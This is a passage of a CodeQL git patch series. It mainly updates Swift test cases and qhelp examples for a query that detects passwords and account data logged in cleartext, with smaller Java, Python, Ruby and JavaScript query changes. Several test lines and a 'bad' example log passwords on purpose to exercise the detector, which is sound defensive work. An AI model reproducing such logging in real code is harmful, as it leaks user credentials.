log.log("\(bankAccount, privacy: .public)") // $ MISSING: hasCleartextLogging=111 + log.log("\(bankAccount, privacy: .sensitive)") // Safe + log.log(level: .default, "\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=113 + log.trace("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=114 + log.debug("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=115 + log.info("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=116 + log.notice("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=117 + log.warning("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=118 + log.error("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=119 + log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=120 + log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 } /* class MyClass { From c1f19dd145f2991d23d9ddf74d236a12929b6577 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 9 Dec 2022 11:04:14 +0100 Subject: [PATCH 141/381] Add stub so that tests work on Linux --- .../CWE-312/cleartextLoggingTest.swift | 51 ++++++++++--------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift index 21d1387fb79..fc4b5021d9d 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift @@ -2,6 +2,7 @@ func NSLog(_ format: String, _ args: CVarArg...) {} func NSLogv(_ format: String, _ args: CVaListPointer) {} +func getVaList(_ args: [CVarArg]) -> CVaListPointer { return CVaListPointer(_fromUnsafeMutablePointer: UnsafeMutablePointer(bitPattern: 0)!) } struct OSLogType : RawRepresentable { static let `default` = OSLogType(rawValue: 0) @@ -83,19 +84,19 @@ struct Logger { // --- tests --- func test1(password: String, passwordHash : String) { - print(password) // $ MISSING: hasCleartextLogging=86 - print(password, separator: "") // $ MISSING: $ hasCleartextLogging=97 - print("", separator: password) // $ hasCleartextLogging=88 - print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=89 - print("", separator: password, terminator: "") // $ hasCleartextLogging=90 - print("", separator: "", terminator: password) // $ hasCleartextLogging=91 + print(password) // $ MISSING: hasCleartextLogging=87 + print(password, separator: "") // $ MISSING: $ hasCleartextLogging=88 + print("", separator: password) // $ hasCleartextLogging=89 + print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=90 + print("", separator: password, terminator: "") // $ hasCleartextLogging=91 + print("", separator: "", terminator: password) // $ hasCleartextLogging=92 - NSLog(password) // $ hasCleartextLogging=93 - NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=94 - NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=95 - NSLog("\(password)") // $ hasCleartextLogging=96 - NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=97 - NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=98 + NSLog(password) // $ hasCleartextLogging=94 + NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=95 + NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=96 + NSLog("\(password)") // $ hasCleartextLogging=97 + NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=98 + NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=99 let bankAccount: Int = 0 let log = Logger() @@ -103,22 +104,22 @@ func test1(password: String, passwordHash : String) { log.log("\(password)") // Safe log.log("\(password, privacy: .auto)") // Safe log.log("\(password, privacy: .private)") // Safe - log.log("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=106 + log.log("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=107 log.log("\(password, privacy: .sensitive)") // Safe - log.log("\(bankAccount)") // $ MISSING: hasCleartextLogging=108 - log.log("\(bankAccount, privacy: .auto)") // $ MISSING: hasCleartextLogging=109 + log.log("\(bankAccount)") // $ MISSING: hasCleartextLogging=109 + log.log("\(bankAccount, privacy: .auto)") // $ MISSING: hasCleartextLogging=110 log.log("\(bankAccount, privacy: .private)") // Safe - log.log("\(bankAccount, privacy: .public)") // $ MISSING: hasCleartextLogging=111 + log.log("\(bankAccount, privacy: .public)") // $ MISSING: hasCleartextLogging=112 log.log("\(bankAccount, privacy: .sensitive)") // Safe - log.log(level: .default, "\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=113 - log.trace("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=114 - log.debug("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=115 - log.info("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=116 - log.notice("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=117 - log.warning("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=118 - log.error("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=119 - log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=120 - log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 + log.log(level: .default, "\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=114 + log.trace("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=115 + log.debug("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=116 + log.info("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=117 + log.notice("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=118 + log.warning("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=119 + log.error("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=120 + log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 + log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=122 } /* class MyClass { From 7e0869965c32bda2b269453a6a849b1daca71787 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 9 Dec 2022 11:11:07 +0100 Subject: [PATCH 142/381] Uncomment tests --- .../CWE-312/cleartextLoggingTest.swift | 36 +++++-------------- 1 file changed, 9 insertions(+), 27 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift index fc4b5021d9d..6e0fb9038b3 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift @@ -121,44 +121,26 @@ func test1(password: String, passwordHash : String) { log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=122 } -/* + class MyClass { var harmless = "abc" var password = "123" } +func getPassword() -> String { return "" } +func doSomething(password: String) { } + func test3(x: String) { // alternative evidence of sensitivity... - UserDefaults.standard.set(x, forKey: "myKey") // $ MISSING: hasCleartextLogging + NSLog(x) // $ MISSING: hasCleartextLogging=137 doSomething(password: x); - UserDefaults.standard.set(x, forKey: "myKey") // $ hasCleartextLogging + NSLog(x) // $ hasCleartextLogging=137 let y = getPassword(); - UserDefaults.standard.set(y, forKey: "myKey") // $ hasCleartextLogging + NSLog(y) // $ hasCleartextLogging=140 let z = MyClass() - UserDefaults.standard.set(z.harmless, forKey: "myKey") // Safe - UserDefaults.standard.set(z.password, forKey: "myKey") // $ hasCleartextLogging + NSLog(z.harmless) // Safe + NSLog(z.password) // $ hasCleartextLogging=145 } - -func test4(passwd: String) { - // sanitizers... - - var x = passwd; - var y = passwd; - var z = passwd; - - UserDefaults.standard.set(x, forKey: "myKey") // $ hasCleartextLogging - UserDefaults.standard.set(y, forKey: "myKey") // $ hasCleartextLogging - UserDefaults.standard.set(z, forKey: "myKey") // $ hasCleartextLogging - - x = encrypt(x); - hash(data: &y); - z = ""; - - UserDefaults.standard.set(x, forKey: "myKey") // Safe - UserDefaults.standard.set(y, forKey: "myKey") // Safe - UserDefaults.standard.set(z, forKey: "myKey") // Safe -} -*/ \ No newline at end of file From 33029b0ed8f4d2e4fd0efc61d9a4ce7953274130 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 9 Dec 2022 11:13:34 +0100 Subject: [PATCH 143/381] Fix sanitizer QLDoc --- swift/ql/lib/codeql/swift/security/CleartextLogging.qll | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll index e6261543077..309edf16f71 100644 --- a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll +++ b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll @@ -31,8 +31,8 @@ private class DefaultCleartextLoggingSink extends CleartextLoggingSink { /** * A sanitizer for `OSLogMessage`s configured with the appropriate privacy option. - * Numeric and boolean arguments aren't redacted unless the `public` option is used. - * Arguments of other types are always redacted unless the `private` or `sensitive` options are used. + * Numeric and boolean arguments aren't redacted unless the `private` or `sensitive` options are used. + * Arguments of other types are always redacted unless the `public` option is used. */ private class OsLogPrivacyCleartextLoggingSanitizer extends CleartextLoggingSanitizer { OsLogPrivacyCleartextLoggingSanitizer() { From 160d89fb4ed55ac5a2913a53e4ef25e0b601ca9b Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 12 Dec 2022 09:36:11 +0100 Subject: [PATCH 144/381] Add qhelp examples --- swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift | 2 ++ .../ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift | 2 ++ 2 files changed, 4 insertions(+) diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift index e69de29bb2d..036001e8717 100644 --- a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift @@ -0,0 +1,2 @@ +let password = "P@ssw0rd" +NSLog("User password changed to \(password)") diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift index e69de29bb2d..1d90ac5e565 100644 --- a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift @@ -0,0 +1,2 @@ +let password = "P@ssw0rd" +NSLog("User password changed") From 49a41c98ee31f910e9dadce27b68df8c3c831116 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 9 Jan 2023 18:00:22 +0100 Subject: [PATCH 145/381] Test that hashed passwords are 'safe' to log This doesn't seem completely right, but the heuristic approach we have regarding sensitive expressions has to draw the line somewhere. --- .../CWE-312/cleartextLoggingTest.swift | 58 +++++++++++-------- 1 file changed, 35 insertions(+), 23 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift index 6e0fb9038b3..9151ab0f44f 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift @@ -90,13 +90,16 @@ func test1(password: String, passwordHash : String) { print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=90 print("", separator: password, terminator: "") // $ hasCleartextLogging=91 print("", separator: "", terminator: password) // $ hasCleartextLogging=92 + print(passwordHash) // Safe - NSLog(password) // $ hasCleartextLogging=94 - NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=95 - NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=96 - NSLog("\(password)") // $ hasCleartextLogging=97 - NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=98 - NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=99 + NSLog(password) // $ hasCleartextLogging=95 + NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=96 + NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=97 + NSLog("\(password)") // $ hasCleartextLogging=98 + NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=99 + NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=100 + NSLog(passwordHash) // SAfe + NSLogv("%@", getVaList([passwordHash as! CVarArg])) // Safe let bankAccount: Int = 0 let log = Logger() @@ -104,22 +107,31 @@ func test1(password: String, passwordHash : String) { log.log("\(password)") // Safe log.log("\(password, privacy: .auto)") // Safe log.log("\(password, privacy: .private)") // Safe - log.log("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=107 + log.log("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=110 + log.log("\(passwordHash, privacy: .public)") // Safe log.log("\(password, privacy: .sensitive)") // Safe - log.log("\(bankAccount)") // $ MISSING: hasCleartextLogging=109 - log.log("\(bankAccount, privacy: .auto)") // $ MISSING: hasCleartextLogging=110 + log.log("\(bankAccount)") // $ MISSING: hasCleartextLogging=113 + log.log("\(bankAccount, privacy: .auto)") // $ MISSING: hasCleartextLogging=114 log.log("\(bankAccount, privacy: .private)") // Safe - log.log("\(bankAccount, privacy: .public)") // $ MISSING: hasCleartextLogging=112 + log.log("\(bankAccount, privacy: .public)") // $ MISSING: hasCleartextLogging=116 log.log("\(bankAccount, privacy: .sensitive)") // Safe - log.log(level: .default, "\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=114 - log.trace("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=115 - log.debug("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=116 - log.info("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=117 - log.notice("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=118 - log.warning("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=119 - log.error("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=120 - log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 - log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=122 + log.log(level: .default, "\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=118 + log.trace("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=119 + log.trace("\(passwordHash, privacy: .public)") // Safe + log.debug("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=121 + log.debug("\(passwordHash, privacy: .public)") // Safe + log.info("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=123 + log.info("\(passwordHash, privacy: .public)") // Safe + log.notice("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=125 + log.notice("\(passwordHash, privacy: .public)") // Safe + log.warning("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=127 + log.warning("\(passwordHash, privacy: .public)") // Safe + log.error("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=129 + log.error("\(passwordHash, privacy: .public)") // Safe + log.critical("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=131 + log.critical("\(passwordHash, privacy: .public)") // Safe + log.fault("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=133 + log.fault("\(passwordHash, privacy: .public)") // Safe } class MyClass { @@ -133,14 +145,14 @@ func doSomething(password: String) { } func test3(x: String) { // alternative evidence of sensitivity... - NSLog(x) // $ MISSING: hasCleartextLogging=137 + NSLog(x) // $ MISSING: hasCleartextLogging=148 doSomething(password: x); - NSLog(x) // $ hasCleartextLogging=137 + NSLog(x) // $ hasCleartextLogging=149 let y = getPassword(); - NSLog(y) // $ hasCleartextLogging=140 + NSLog(y) // $ hasCleartextLogging=152 let z = MyClass() NSLog(z.harmless) // Safe - NSLog(z.password) // $ hasCleartextLogging=145 + NSLog(z.password) // $ hasCleartextLogging=157 } From 8e0a018673c6968831a9e8612a2ecd45521ca8c8 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 9 Jan 2023 18:05:09 +0100 Subject: [PATCH 146/381] Consider Int8 and UInt8 as OsLogNonRedactedTypes --- swift/ql/lib/codeql/swift/security/CleartextLogging.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll index 309edf16f71..b3aa3ba414e 100644 --- a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll +++ b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll @@ -53,7 +53,7 @@ private class OsLogPrivacyCleartextLoggingSanitizer extends CleartextLoggingSani /** A type that isn't redacted by default in an `OSLogMessage`. */ private class OsLogNonRedactedType extends Type { OsLogNonRedactedType() { - this.getName() = [["", "U"] + "Int" + ["", "16", "32", "64"], "Double", "Float", "Bool"] + this.getName() = [["", "U"] + "Int" + ["", "8", "16", "32", "64"], "Double", "Float", "Bool"] } } From 7f5344e025b875d76140fcbf51a9295e190735b7 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Jan 2023 17:08:27 +0000 Subject: [PATCH 147/381] Update swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll Co-authored-by: Tony Torralba --- swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll index 9718ebe764b..217690039ed 100644 --- a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll +++ b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll @@ -11,7 +11,7 @@ class CharacterType extends StructType { class IntegerType extends Type { IntegerType() { this.getName() = - ["Int", "Int8", "Int16", "Int32", "Int64", "UInt", "UInt8", "Uint16", "Uint32", "UInt64"] + ["Int", "Int8", "Int16", "Int32", "Int64", "UInt", "UInt8", "UInt16", "UInt32", "UInt64"] or this instanceof BuiltinIntegerType } From 2edbfbf8bc781b877249545215f475adab4a2197 Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Mon, 9 Jan 2023 20:35:20 +0100 Subject: [PATCH 148/381] python: update test expectations ...now the bug is fixed --- .../query-tests/Security/CWE-022/TarSlip.expected | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022/TarSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022/TarSlip.expected index 774b0005433..9a5571a8033 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022/TarSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022/TarSlip.expected @@ -18,6 +18,7 @@ edges | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:142:9:142:13 | GSSA Variable entry | | TarSlipImprov.py:142:9:142:13 | GSSA Variable entry | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | +| TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:177:9:177:13 | GSSA Variable entry | | TarSlipImprov.py:177:9:177:13 | GSSA Variable entry | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:183:9:183:13 | GSSA Variable entry | @@ -71,6 +72,8 @@ nodes | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TarSlipImprov.py:142:9:142:13 | GSSA Variable entry | semmle.label | GSSA Variable entry | | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | semmle.label | ControlFlowNode for entry | +| TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | semmle.label | ControlFlowNode for tarc | | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TarSlipImprov.py:177:9:177:13 | GSSA Variable entry | semmle.label | GSSA Variable entry | | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | semmle.label | ControlFlowNode for entry | @@ -124,6 +127,7 @@ subpaths | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | From 293a2037569e8d404b1d4b1ab693449bdc9f3ccf Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 15:10:23 -0500 Subject: [PATCH 149/381] Move JavascriptInterfaceMethod to WebView.qll --- .../ql/lib/semmle/code/java/frameworks/android/Android.qll | 7 ------- .../ql/lib/semmle/code/java/frameworks/android/WebView.qll | 7 +++++++ 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/android/Android.qll b/java/ql/lib/semmle/code/java/frameworks/android/Android.qll index 9e98758a523..1a992eb5565 100644 --- a/java/ql/lib/semmle/code/java/frameworks/android/Android.qll +++ b/java/ql/lib/semmle/code/java/frameworks/android/Android.qll @@ -127,10 +127,3 @@ class CreateFromParcelMethod extends Method { this.getEnclosingCallable().getDeclaringType().getAnAncestor() instanceof TypeParcelable } } - -/** - * A method annotated with the `android.webkit.JavascriptInterface` annotation. - */ -class JavascriptInterfaceMethod extends Method { - JavascriptInterfaceMethod() { this.hasAnnotation("android.webkit", "JavascriptInterface") } -} diff --git a/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll b/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll index dadcef4158e..ca5954a3dd2 100644 --- a/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll +++ b/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll @@ -85,3 +85,10 @@ class ShouldOverrideUrlLoading extends Method { this.hasName("shouldOverrideUrlLoading") } } + +/** + * A method annotated with the `android.webkit.JavascriptInterface` annotation. + */ +class JavascriptInterfaceMethod extends Method { + JavascriptInterfaceMethod() { this.hasAnnotation("android.webkit", "JavascriptInterface") } +} From da90ae0e8f0a73e910df84eb264a46ae1300a4ec Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Tue, 10 Jan 2023 11:18:53 +0100 Subject: [PATCH 150/381] Update java/ql/lib/semmle/code/java/dataflow/FlowSources.qll --- java/ql/lib/semmle/code/java/dataflow/FlowSources.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll b/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll index 055cfb9f94e..e10cd0db708 100644 --- a/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll +++ b/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll @@ -300,7 +300,7 @@ class OnActivityResultIntentSource extends OnActivityResultIncomingIntent, Remot } /** - * A parameter of a method annotated with the `android.webkit.JavascriptInterface` method + * A parameter of a method annotated with the `android.webkit.JavascriptInterface` annotation. */ class AndroidJavascriptInterfaceMethodParameter extends RemoteFlowSource { AndroidJavascriptInterfaceMethodParameter() { From f2658a0936912267c9e42fadc19952a5ff3943f1 Mon Sep 17 00:00:00 2001 From: Erik Krogh Kristensen Date: Tue, 10 Jan 2023 12:56:22 +0100 Subject: [PATCH 151/381] apply suggestions from doc review Co-authored-by: mc <42146119+mchammer01@users.noreply.github.com> --- .../src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index f6dcb452661..32e8c369ef5 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -5,7 +5,7 @@

    -When a library function dynamically constructs code in a potentially unsafe way, then +When a library function dynamically constructs code in a potentially unsafe way, it's important to document to clients of the library that the function should only be used with trusted inputs. @@ -35,7 +35,7 @@ then an attacker might be able to execute arbitrary code on the system.

    To avoid this problem, either properly document that the function is potentially -unsafe, or use an alternative solution such as JSON.parse or another library, like in the examples below, +unsafe, or use an alternative solution such as JSON.parse or another library that does not allow arbitrary code to be executed.

    From 23a847b1cfca06e56c3962d8ea06798dfba9f92f Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 10 Jan 2023 10:10:36 +0100 Subject: [PATCH 152/381] track shell:true more in js/shell-command-constructed-from-input --- .../ql/lib/semmle/javascript/ApiGraphs.qll | 7 ++++++- ...eShellCommandConstructionCustomizations.qll | 5 +++++ .../UnsafeShellCommandConstruction.expected | 18 ++++++++++++++++++ .../UnsafeShellCommandConstruction/lib/lib.js | 9 +++++++++ 4 files changed, 38 insertions(+), 1 deletion(-) diff --git a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll index 3e708098635..a9c8bca2345 100644 --- a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll +++ b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll @@ -210,7 +210,12 @@ module API { * This is similar to `asSink()` but additionally includes nodes that transitively reach a sink by data flow. * See `asSink()` for examples. */ - DataFlow::Node getAValueReachingSink() { result = Impl::trackDefNode(this.asSink()) } + DataFlow::Node getAValueReachingSink() { + result = Impl::trackDefNode(this.asSink()) + or + // in case `asSink()` is not a `SourceNode`. + result = asSink() + } /** DEPRECATED. This predicate has been renamed to `asSink`. */ deprecated DataFlow::Node getARhs() { result = this.asSink() } diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll index ca6920db466..6a2b4d94f35 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll @@ -166,6 +166,11 @@ module 